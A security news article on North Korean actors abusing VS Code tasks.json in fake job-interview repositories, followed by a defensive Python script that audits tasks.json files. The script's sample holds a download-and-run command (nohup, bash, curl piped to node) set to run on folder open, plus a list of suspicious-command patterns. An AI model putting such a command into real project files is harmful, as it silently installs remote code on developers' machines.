North Korean threat actors have significantly evolved their attack strategies, now extensively abusing Microsoft Visual Studio Code to execute malicious payloads on victim systems. This “Contagious Interview” campaign represents a concerning shift from traditional social engineering to exploiting trusted development environments, targeting developers directly with sophisticated malware delivery.
Researchers have identified that these advanced persistent threats (APTs) are embedding malicious commands within Visual Studio Code’s configuration files, bypassing the need for suspicious email links or click-through actions previously observed. This evolution allows for direct malware execution upon a developer unknowingly opening a compromised repository and granting repository trust, a standard workflow step.
Hackers Exploiting Visual Studio Code for Malware Execution
The exploitation of Visual Studio Code leverages its legitimate functionality to stealthily deliver malicious code. The attack chain begins when developers clone repositories, often disguised as recruitment assignments or technical job interviews, hosted on platforms like GitHub or GitLab. Within these repositories, attackers embed commands within the `tasks.json` configuration file.
When a developer opens such a repository in Visual Studio Code and grants trust, the application automatically processes the `tasks.json` file. This process can trigger the execution of arbitrary code on the victim’s system without explicit user intervention beyond the initial trust prompt. This sophisticated approach circumvents many traditional security measures designed to detect and block external threats.
Jamf analysts and researchers observed in December that attackers are further refining these techniques. They discovered dictionary files within these repositories containing heavily obfuscated JavaScript code. This JavaScript executes silently when a malicious repository is opened, and attackers are employing increasingly advanced obfuscation methods to evade detection and analysis by security tools.
The Infection Mechanism and Execution Flow
The infection mechanism within this campaign is designed for stealth and persistence. Once a developer clones and opens a malicious Git repository, the malware on macOS systems initiates a background shell command. This command, combining `nohup` and `bash` with `curl`, is used to download a JavaScript payload from infrastructure hosted on Vercel.
The downloaded payload is executed directly within the Node.js runtime rather than inside the editor. Because the malicious process runs under Node.js, it continues running even if the Visual Studio Code application itself is closed. This persistence mechanism is highly effective as it operates independently of the editor’s primary process, making it more difficult to terminate.
Following successful execution, the JavaScript payload establishes a persistent connection to a command-and-control (C2) server. Reports indicate this C2 server is located at the IP address 87.236.177.93, and the malware beacons to it every five seconds. The initial data transmitted includes critical system information such as the hostname, MAC addresses, and operating system details, which are then sent to the attackers for further tasking.
The malware’s design incorporates a persistent execution loop, enabling it to receive and execute additional JavaScript instructions from the C2 server. This capability allows attackers to maintain long-term access to the compromised systems and perform a wide range of malicious activities. The sophistication of this campaign highlights the evolving tactics of state-sponsored threat actors who are increasingly leveraging legitimate software tools for malicious purposes.
Developers are advised to exercise extreme caution when cloning repositories from unknown or untrusted sources. It is crucial to meticulously review the contents of any repository before marking it as trusted, particularly scrutinizing `tasks.json` files for any unusual or suspicious configurations that might indicate malicious intent. Advanced threat detection solutions capable of monitoring code editor behavior and network communications can also provide an additional layer of defense against such sophisticated attacks.
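As an added example (not from the article or from Jamf), a small Python audit script that flags the tasks.json patterns described above: tasks configured to run on folder open (VS Code's `runOptions.runOn: "folderOpen"`) and commands invoking `nohup`, `curl` or Node. It parses tasks.json as JSONC, which VS Code accepts, so comments and trailing commas do not break the check; the sample file and the token list are constructed for illustration.

```python
import json
import re
from typing import List

# Constructed heuristics mirroring the behaviour described above (nohup/bash/curl
# and Node.js execution); these are illustrative, not Jamf's detection signatures.
SUSPICIOUS = re.compile(r"\b(nohup|curl|wget|node\s+-e|base64\s+-d|eval)\b")

# String-aware patterns: VS Code reads tasks.json as JSONC, so comments and trailing
# commas are legal, but a naive stripper would also mangle "https://..." inside strings.
_STRING = r'("(?:\\.|[^"\\])*")'
_COMMENT = re.compile(_STRING + r"|/\*.*?\*/|//[^\n]*", re.S)
_TRAILING_COMMA = re.compile(_STRING + r"|,(\s*[}\]])")

def strip_jsonc(text: str) -> str:
    """Turn JSONC into strict JSON without touching string contents."""
    text = _COMMENT.sub(lambda m: m.group(1) or "", text)
    return _TRAILING_COMMA.sub(lambda m: m.group(1) or m.group(2), text)

def task_commands(task: dict) -> str:
    """Flatten command and args, including per-platform overrides (windows/osx/linux)."""
    parts: List[str] = []
    for scope in (task, task.get("windows"), task.get("osx"), task.get("linux")):
        if scope:
            parts.append(str(scope.get("command", "")))
            parts.extend(str(a) for a in scope.get("args", []))
    return " ".join(p for p in parts if p)

def audit_tasks_json(text: str) -> List[str]:
    """One finding per task that auto-runs on folder open or invokes suspicious tooling."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        label = task.get("label", "<unnamed>")
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(f"{label}: runs automatically on folderOpen")
        cmd = task_commands(task)
        hits = sorted(set(SUSPICIOUS.findall(cmd)))
        if hits:
            findings.append(f"{label}: suspicious tokens {hits} in: {cmd}")
    return findings

# Constructed sample in the shape of the technique the article describes.
SAMPLE = """{
  // looks like a build task, actually launches a detached downloader
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell",
      "command": "nohup bash -c 'curl -s https://example.invalid/p.js | node' &",
      "runOptions": { "runOn": "folderOpen" }, },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}"""

if __name__ == "__main__":
    for finding in audit_tasks_json(SAMPLE):
        print(finding)
```

Run it against `.vscode/tasks.json` in a freshly cloned repository before answering the trust prompt; a clean build task produces no findings, while an auto-run task or a download-and-execute command is reported by label.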